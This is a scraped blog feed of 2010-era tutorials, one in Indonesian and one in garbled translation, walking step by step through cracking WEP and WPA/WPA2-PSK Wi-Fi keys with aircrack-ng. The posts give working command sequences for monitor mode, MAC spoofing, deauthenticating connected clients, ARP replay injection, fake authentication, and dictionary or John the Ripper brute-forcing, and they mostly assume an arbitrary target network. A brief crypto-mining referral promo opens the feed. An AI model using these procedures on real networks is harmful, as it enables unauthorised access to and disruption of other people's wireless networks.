Kluwan Backtrack

Hashes Free From Noobminer

noreply@blogger.com (Mr. X) — Thu, 21 Dec 2017 07:38:00 -0800

Christmas is here! During December you will receive double the hashes for all your referrals. Instead of 2 million hashes, you will get 4 million! Invite all your friends! please click here Referral Link (Share this with your friends and receive bonus hashes) yes

How to WPA Crack

noreply@blogger.com (Mr. X) — Thu, 13 May 2010 11:41:00 -0700

Differences

WPA is an encryption algorithm that takes care of a lot of the vunerablities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different.
A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

WPA Flavours

WPA basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.
PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved, for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key but upon the initialization of the TKIP, like during an authentication, we get the password (well the PMK anyways). A robust dictionary attack will take care of a lot of consumer passwords.
Radius involves physical transferring of the key and encrypted channels blah blah blah, look it up to learn more about it but 90% of commerical APs do not support it, it is more of an enterprise solution then a consumer one.

The Handshake

The WPA handshake was designed to occur over insecure channels and in plaintext so the password is not actually sent across. There are some fancy dancy algorithms in the background that turn it into a primary master key, PMK, and the like but none of that really matters cause the PMK is enough to connect to the network.
The only step we need to do is capture a full authenication handshake from a real client and the AP. This can prove tricky without some packet injection, but if you are lucky to capture a full handshake, then you can leave and do the rest of the cracking at home.
We can force an authenication handshake by launching a Deauthentication Attack, but only if there is a real client already connected (you can tell in airodump). If there are no connected clients, you're outta luck.
Like for WEP, we want to know the channel the WPA is sitting on, but the airodump command is slightly different. We don't want just IVs so we don't specify an IV flag. This will produce "lucid.cap" instead of "lucid.ivs". Assume WPA is on channel 6 and wireless interface is ath0.

./airodump ath0 lucid 6

Dictionary Brute Force

The most important part of brute forcing a WPA password is a good dictionary. Check out http://www.openwall.com/wordlists/ for a 'really' good one. It costs money, but its the biggest and best I've ever seen (40 Million words, no duplicates, one .txt file). There is also a free reduced version from the same site but i'm sure resourceful people can figure out where to get a good dictionary from.
When you have a good dictionary the crack is a simple brute force attack:

./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist

Either you'll get it or you won't... depends on the strength of the password and if a dictionary attack can crack it.

Using Aireplay

Aireplay is the fun part. You get to manipulate packets to trick the network into giving you what you want.

WEP Attacks

Attacks used to create more traffic on WEP networks to get more IVs.

ARP Injection

ARP Replay is a classic way of getting more IV traffic from the AP. It is the turtle. Slow but steady and almost always works. We need the BSSID of the AP and the BSSID of an associated client. If there are no clients connected, it is possible to create one with another WEP attack explained below: Fake Authentication Attack.
With airodump listening, we attack:

./aireplay -3 -b  -h  ath0

Note: The -3 specifys the type of attack (3=ARP Replay).
This will continue to run, and airodump, listening fron another terminal, will pick up any reply IVs.

Interactive Packet Replay

Interactive Packet Reply is quite a bit more advanced and requires capturing packets and constructing your own. It can prove more effective then simple ARP requests but I won't get into packet construction here.
A useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV). Some APs do, some don't.

aireplay -2 -b  -h  -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

Fake Authentication Attack

This attack won't generate any more traffic but it does create an associative client MAC Address useful for the above two attacks. Its definately not as good as having a real, connected client, but you gots to do what you gots to do.
This is done easiest with another machine because we need a new MAC address but if you can manually change your MAC then that'll work too. We'll call your new MAC address "Fake MAC".
Now most APs need clients to reassociate every 30 seconds or so or they think they're disconnected. This is pretty arbitrary but I use it and it has worked but if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.

./aireplay -1 30 -e '' -a  -h  ath0

If successful, you should see something like this:

23:47:29  Sending Authentication Request
 23:47:29  Authentication successful
 23:47:30  Sending Association Request
 23:47:30  Association successful :-)

Awesome! Now you can use the above two attacks even though there were no clients connected in the first place! If it fails, there may be MAC Address Filtering on so if you really want to use this, you'll have to sniff around until a client provides you with a registered MAC to fake.

WPA Attacks

So far, the only way to really crack WPA is to force a re-authentication of a valid client. We need a real, actively connected client to break WPA. You might have to wait a while.

Deauthentication Attack

This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:

aireplay -0 5 -a  -c  ath0

After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.

Conclusion

Well thats that. APs crack fairly often but sometimes there is just nothing you can do. Obviously you are not allowed to illegally crack other people's wireless connections, this is purely for penetration testing purposes and some fun.

How to WEP Crack

noreply@blogger.com (Mr. X) — Thu, 13 May 2010 11:37:00 -0700

Theory

A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection.
A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.
Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition.
A couple of things will cause us some problems.

If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key.
Theres no traffic, therefore no packets - we can fix this.
MAC Address Filtering - we can fix this too.

Setting up your tools

We're gonna need 3 or 4 shells open, we have 5 tools:

airodump - Grabbing IVs
aircrack - Cracking the IVs
airdecap - Decoding captured packets
airreplay - (My Favourite) Packet injector to attack APs.
kismet - Network Sniffer, can grab IVs as well.

For a standard WEP hack we'll usally only need airodump, aircrack, and kismet (server and client). If we run into some problems we might have to use airreplay to fiddle about.
I'll leave you to config all these tools up, for the most part they should just be defaults with the exception of kismet.

Finding the Network

First step is we need to find a netork to crack. Start up kismet and start sniffing for APs. Leave it on for a bit so that it can discover all the important information about the networks around. What we want from kismet is:

Encryption type: Is it WEP 64-bit? 128-bit?
What channel is it on? Can greatly speed up IV collection.
AP's IP Address
BSSID
ESSID

All this info isn't required but the more you have, the more options you have later to crack and sniff. We can get a lot of this from airodump as well but I find the channel is important.

Capturing IVs

Alright, we know what we wanna crack, so lets start capturing packets. You can use kismet to capture files but I prefer airodump because it keeps a running count of all the IVs I've captured and I can crack and airodump will automatically update aircrack with new IVs as it finds them.
Note: kimset can interfere with airodump so make sure you close it down before starting airodump.
Airodump is pretty straight forward with its command line looking something like this:

./airodump   [channel] [IVs flag]

interface is your wireless interface to use - required.
output prefix is just the filname it'll prepend, - required.
channel is the specific channel we'll scan, leave blank or use 0 to channel hop.
IVs flag is either 0 or 1, depending on whether you want all packets logged, or just IVs.

My wireless card is ath0, output prefix i'll use "lucid", the channel we sniffed from kismet is 6, and IVs flag is 1 because we just want IVs. So we run:

./airodump ath0 lucid 6 1

Airodump will come up with a graph showing us all the APs and their relevant info, as well as client stations connected to any of the APs.

BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
 
 00:23:1F:55:04:BC   76    21995   213416   6  54. WEP   hackme 
 
 BSSID              STATION            PWR  Packets  Probes
 
 00:23:1F:55:04:BC  00:12:5B:4C:23:27  112     8202  hackme
 00:23:1F:55:04:BC  00:12:5B:DA:2F:6A   21     1721  hackme

The second line shows us some info about the AP as well as the number of beacons and data packets we've collected from the AP. The two last lines show us two authenticated clients. Where they are connected to and the packets they are sending. We won't use this client info in a straight theory hack but in practice we'll need this info to actively attack the AP.
This step may take a long time or could be very short. It depends how busy the AP is and how many IVs we are collecting. What we are doing is populating a file "lucid.ivs" with all the IV important packet info. Next, we'll feed this to aircrack. To move onto the next step, we'll want at least 100,000 packets (under # Data in airodump) but probably more.

Using IVs to Decrypt the Key

Ok, pretend you have enough IVs now to attempt a crack. Goto a new terminal (without stopping airodump - remember it'll autoupdate as new IVs are found) and we'll start aircrack. It looks something like this:

./aircrack [options]

There are a lot of options so you can look them up yourself, i'll be using common ones here that should get you a crack. Our input file is "lucid.ivs", the options we will use are:

-a 1 : forces a WEP attack mode (2 forces WPA)
either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique.
-n 64 or -n 128 : WEP key length, omit if not known by now.

So our command will look like:

./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs

and off it goes, resembling the picture from the top. Keep an eye on the Unique IV count as it should increase if airodump is still running. For all intents and purposes you are done. That'll pop open most old wireless routers with some traffic on them.

Anticipated Problems

There are lots of problems that can come up that will make the above fail, or work very slowly.

No traffic
- No traffic is being passed, therefore you can't capture any IVs.
- What we need to do is inject some special packets to trick the AP into broadcasting.
- Covered below in WEP Attacks
MAC Address filtering
- AP is only responding to connected clients. Probably because MAC address filtering is on.
- Using airodumps screen you can find the MAC address of authenticated users so just change your MAC to theirs and continue on.
- Using the -m option you can specify aircrack to filter packets by MAC Address, ex. -m 00:12:5B:4C:23:27
Can't Crack even with tons of IVs
- Some of the statistical attacks can create false positives and lead you in the wrong direction.
- Try using -k N (where N=1..17) or -y to vary your attack method.
- Increase the fudge factor. By default it is at 2, by specifying -f N (where N>=2) will increase your chances of a crack, but take much longer. I find that doubling the previous fudge factor is a nice progression if you are having trouble.
Still Nothing
- Find the AP by following the signal strength and ask the admin what the WEP key is.

How to Crack WEP Keys on Backtrack

noreply@blogger.com (Mr. X) — Fri, 23 Apr 2010 22:17:00 -0700

Allright now you should be in Backtrack the desktop should be all loaded and you should be ready to start cracking those WEP Keys.
1. First you must click on the Terminal icon in the bottom toolbar it looks like a black TV.
2. Now you must type in airmon-ng the command will display a card name which you will need to remember and substitute for the “eth1″.
3. Now type airmon-ng stop “eth1″.
4.Now type ifconfig “eth1″ down
5.Now type macchanger –mac 00:11:22:33:44:55 “eth1″
6.Now type airmon-ng start “eth1″
7.Now type airodump-ng “eth1″
*You need to note the Channel, The BSSID, and the ESSID to crack.*
8.Now type airodump-ng -c “whatever channel” -w “whateverfilenameuwant” –BSSID “whateverbssid” “eth1″
*Make sure that you leave this window open so run a new Terminal.*
9.aireplay-ng -1 0 -a “bssid” -h 00:11:22:33:44:55 “eth1″
*Leave this windows open.*
10.aireplay-ng -3 -b “bssid -h 00:11:22:33:44:55 “eth1″
*Leave this window open.*
11. Now go back and wait for the Data to hit 1000 IVS than run the next command.
*This is for a 32 bit WEP.*
11.aircrack-ng -b “bssid” “whateverfilename”.
The key that is displayed

How to crack wpa - psk

noreply@blogger.com (Mr. X) — Fri, 23 Apr 2010 16:13:00 -0700

As I mentioned in a previous blog, my team is working on a project where we perform a Man-in-the-Middle (MitM) attack on a WEP encrypted wireless network. The point of the project is to demonstrate how quick and easy it is to hack a WEP encrypted wireless network and to discuss and encourage additional methods of wireless security.

As I searched for useful hack tools I became especially excited about Aircrack. Aircrack is a package of great wireless auditing tools. It includes:

Airodump: 802.11 packet capture program
Aireplay: 802.11 packet injection program
Aircrack: static WEP and WPA-PSK key cracker
Airdecap: decrypts WEP/WPA capture file

The amount of time it takes to hack an encrypted wireless network is dependent on the amount of traffic. Less traffic means the hack will take more time and vise versa. That's why the Aireplay tool is so exciting. It is basically a traffic generator, which enables the hacker to up the networks traffic level, thus speeding up the hack.

The other tools that caught my interest are Aircrack and Airdecap because they work for both WEP and WPA encryption, which in my experience thus far hacking tools are typically limited to WEP.

All IT/Tech geeks know that WEP can be cracked with relative ease, but what is not as well know is how quick/easy it is to crack WPA-PSK encrypted network. Since the tool exists we've decided to expand our scope to cracking a WPA-PSK encrypted network rather then a WEP encrypted network.

Now all of my comments on Aircrack thus far are only based on research. Hopefully we will be able to play with these tools tonight and find out how well they work. I will be sure to give a review of the package once we've finished our work.

If anyone has experience with this package I welcome your comments/lessons learned.
Source : http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730

BackTrack History

noreply@blogger.com (Mr. X) — Thu, 22 Apr 2010 17:46:00 -0700

The BackTrack distribution originated from the Linux counterparts WHAX and Max Moser's Auditor Security Collection - "The Swiss Army Knife for security assessments". Both where focused on Linux-based penetration tests.
While WHAX was packed with more features, Auditor was based on structure and stability. Auditor featured well-laid-out menus for its collection of over 300 tools for troubleshooting, network and systems-fortifying. Its user-friendliness resulted in enhanced usability for penetration testing which led to the formulation of the BackTrack security testing distribution. The Auditor Security Collection was a Live CD based on Knoppix.
WHAX, a name derived from White-Hat and SLAX, was a distribution designed for security tasks. WHAX emerged from Whoppix, a Knoppix-based security distro. When Whoppix reached version 3.0 it was renamed as WHAX, to reflect the change of parent distribution from Knoppix to SLAX. Customized by Mati Aharoni, a security consultant, WHAX made its central focus on penetration testing. WHAX made it possible to test and verify the security of a network from many computers located in various places.
The first real BackTrack release was available to the public in the early 2007. It was a major step in advance compared to all the other security penetration testing distros available. Through the years and the releases the distro became the standard as penetration testing toolkit all over the world. Major companies like SANS or even the FBI where using the CD-ROM as base for their work. The demand for such a tool-suite was immense. Release "pre-4" has been downloaded over 4'000'000 times. The IRC channels and also the E-Mail and Forum entries became larger and lager. The community became so big that Backtrack needed a lot of help from the community.
Now at the early 2010 BackTrack encounters again a major change......

Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu

noreply@blogger.com (Mr. X) — Wed, 21 Apr 2010 17:38:00 -0700

Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.

Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.

Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu

sudo apt-get install aircrack-ng

Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)

Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada

sudo su

ifconfig -a

Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0

ifconfig wlan0 up

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.

airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.

airodump-ng mon0

cat : mon0 adalah interface virtual hasil dari airmon-ng tadi

Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.

airodump-ng -w coba –channel 11 –bssid 001122334455 mon0

ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’

Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking

aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0

ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth

Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt

ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt

Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat pengetahuan yang belum tau aja. Selamat mencoba

Tutorial WPA crack with Backtrack 3

noreply@blogger.com (Mr. X) — Fri, 9 Apr 2010 06:34:00 -0700

This Video demonstrates WPA cracking using dictionary based brute force, all tools used in demonstration are available in Backtrack3.

Backtrack is a security penetration testing live open source Linux distro, Backtrack took two of the best, Whax and Auditor and merged them to make one meaningful distro that emerged as an ethical hackers best choice for security auditing. It comes loaded with tools including network mapping, Info gathering, vulnerability Identification tools, and even some for Bluetooth hacking.
Commands Used in video (Step by Step):
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger –mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid)wlan0
8)aircrack-ng (filename-01.cap)-w (dictionary location)

Backtrack can be downloaded from here

How To Crack A Wi-Fi Network’s WEP Password

noreply@blogger.com (Mr. X) — Fri, 19 Mar 2010 03:46:00 -0700

First run the following to get a list of your network interfaces: airmon-ng

The only one I’ve got there is labelled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger –mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

If you don’t get the same results from these commands as pictured here, most likely your network adaptor won’t work with this particular crack. If you do, you’ve successfully “faked” a new MAC address on your network interface, 00:11:22:33:44:55.
Now it’s time to pick your network. Run:

airodump-ng (interface)

To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labelled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.
Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you’ve got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands.
Now we’re going to watch what’s going on with that network you chose and capture that information to a file. Run:

airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo", which is the name of the network name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point’s SSID name, which in my case is yoyo. What you want to get after this command is the reassuring “Association successful” message with that smiley face.

You’re almost there. Now it’s time for:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we’re creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here’s the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack. Watch the number in the “#Data” column—you want it to go above 10,000. (Pictured below it’s only at 854.)
Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adaptor), this process could take some time. Wait until that #Data goes over 10k, though—because the crack won’t work if it doesn’t. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you’ve collected enough data, it’s the moment of truth. Launch a third Konsole window and run the following to crack that data you’ve collected:

aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it’s the one with .cap as the extension.
If you didn’t get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this:
The WEP key appears next to “KEY FOUND.” Drop the colons and enter it to log onto the network.

Problems Along the Way

With this article I set out to prove that cracking WEP is a relatively “easy” process for someone determined and willing to get the hardware and software going. I still think that’s true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you’ll notice that the last screenshot up there doesn’t look like the others—it’s because it’s not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven’t captured enough data for aircrack to decrypt the key.http://www.lifehacker.com.au/2009/07/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack/

Back Track 4 on USB with persistent changes – bootable BT4 USB stick

noreply@blogger.com (Mr. X) — Fri, 19 Feb 2010 03:55:00 -0800

If you want to have Back Track 4 on USB with persistent changes and want to make it bootable USB with linux just follow the instructions in the article How To:
“Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post is written for my personal use with a help I found somewhere online, I post it here to show my hardware compatability).

To make BT4 bootable with persistent changes I used 2 USB sticks. The first to launch Back Track (BT2,3 or4) without any changes and the second to prepare and make all changes in linux for my Back Track 4. I used 2 USB sticks because it is easier.

Well, when you finish Step 5 you will need to follow the instructions below:

Let’s say we have a formatted second partition, mount it and create a changes directory in the root of the file system. Open shell and execute these commands:

    mount /dev/sdc2 /mnt/sdc2
    cd /mnt/sdc2
    mkdir changes

Don’t forget that it can be sdc2 but not sdb2. It depends on your computer and configurations. If you use 2 USB sticks there should be sdc2. next we will make some changes to how the system boots. Now execute these commands:

    cd /boot/syslinux
    chmod +Xx lilo
    chmod +Xx syslinux

Then you need to open syslinux.cfg and modify it. To do that execute the commands:

    cd /mnt/sdc1/boot/syslinux
    kwrite syslinux.cfg

I copied the boot definition I wanted to change and created a new entry so I would have a fall back option if something became broken. well, in the file find:

1. “LABEL BT4″

2. Copy this line and next 3 lines and paste all these lines below existing 4 lines. Well, now we have the same 4 lines. Our new section.

3. Change the “LABEL BT4″ to something you want like “LABEL BT4-persistent” and description to something like “MENU LABEL BT4 Beta – Console – Persistent”.

4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw” where the x is the drive appropriate for your system. In my case it looks like this, “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that goes after “rw”. I think there should be “quite” or something similar at the end of the line. Just delete this word.

5. Save your changes and exit the editor.

That should work fine now. Reboot and select the option you setup configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all instruction step by step you won’t have any errors.

Tips and Trick Using Backtrack with Virtual Box

noreply@blogger.com (Mr. X) — Tue, 16 Feb 2010 04:17:00 -0800

Hi Guest, verry simple to use backtrack verry good with virtual box.
Step one download Backtrack, step two download Virtual Box. All is free and how to using your search in the youtube.
Good luck !

Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

noreply@blogger.com (Mr. X) — Sat, 13 Feb 2010 04:53:00 -0800

Basic steps :

Put interface in monitor mode
Find wireless network (protected with WPA2 and a Pre Shared Key)
Capture all packets
Wait until you see a client and deauthenticate the client, so the handshake can be captured
Crack the key using a dictionary file (or via John The Ripper)

I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.
First, put the card in monitor mode :

root@bt:~# airmon-ng 

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.
That’s it
Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :
8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.

Here's how to get the WEP key (WEP-based wireless password)

noreply@blogger.com (Mr. X) — Fri, 12 Feb 2010 08:33:00 -0800

Here's how to get the WEP key (WEP-based wireless password)

Without bsa stale well, to the point ... First prepare the equipment used to ...
1) laptop, let me take him lightly.
2) wireless adapter okay with chipset supports the ability to walk dl monitor mode and perform packet injection. Dl it can use a wireless adapter, dg dr atheros chipset.
3) To perform this attack, I recommend using Linux OS. more precisely backtrack min v 3.0 (ato v 2.0 + dr jasakom). can be downloaded at http://remote-exploit.org
Cracking the WEP Key dg backtrack (klu bs, mudeng little comand2 in backtrack ttg ^ _ ^)
> run konsole 1

1) Make sure you use a wireless adapter is recommended reply. to see command airmon dg bs-ng and to see the detail use the command iwconfig
2) Now it's time to order a wireless scanner
airodump-ng ath0. This command requested that airodump-ng to see all the data packets via adapter ath0. Then you will get the wireless information in hack-be.
3) Stelah set goals for mlakukan wireless network cracking, skarang time to collect as much data the network dr to be on-crack dg statistical methods. The command
airodump-ng - channel 1 - BSSID 00:18:39:39:23:66-w results ath0
- channel 1 (dg adjust the target channel sample channel 1)
- BSSID (BSSID sesuaikn dg jg yg seen as a target a second way).

> run konsole 2
4) Helping create the data packet
command,,,
aireplay-ng - arpreplay-b 00:18:39:39:23:66-h 00:18: DE: C3: D8: 68 ath0

-b 00:18:39:39:23:66 (condition BSSID / MAC address of AP)
-h 00:18: DE: C3: D8: 68 (MAC address of the client kompie dr yg dg connected sdang AP)

> run konsole 3
5) Direct PTW method. crack the WEP key based on the collected data packets. with command
aircrack-PTW-01.cap results

- Order the results-01 comes from the name file is used for storing sets of data packets. ( step 3)
-. Seal the file type "result" requisite dl this WEP key cracking.

6) Wait patiently until the process stops dah 3 console shows "KEY FOUND! [...................]"
7) Use it wisely, okey
Best successful yes,,,,good luck.

Wi-Fi Hacking – Crack WEP

noreply@blogger.com (Mr. X) — Sun, 7 Feb 2010 19:38:00 -0800

To crack WEP at this time, Me using BackTrack OS. Let’s go, open some consoles:
airmon-ng ==> adapter list
airmon-ng stop ath0 ==> destroy adapter virtual
airmon-ng stop ath1 ==> destroy adapter virtual
airmon-ng start wifi0 ==> create new adapter virtual
Console 1:
airodump-ng ath0 ==> scanning
airodump-ng –channel CHANNEL_NUMBER –bssid MAC_AP -w FILE_NAME_SAVE ath0 ==> Capture information
Console 2:
